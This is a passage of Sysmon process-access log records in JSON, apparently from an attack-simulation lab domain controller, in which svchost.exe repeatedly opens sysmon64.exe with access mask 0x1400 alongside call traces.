EM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2740,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:54.930\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:54.930","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2741,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:54.930\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:54.930","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2742,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:54.930\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:54.930","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2743,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:54.930\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:54.930","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2744,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:54.930\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:54.930","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2745,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:54.930\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:54.930","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2746,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:54.930\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:54.930","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2747,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:54.930\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:54.930","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
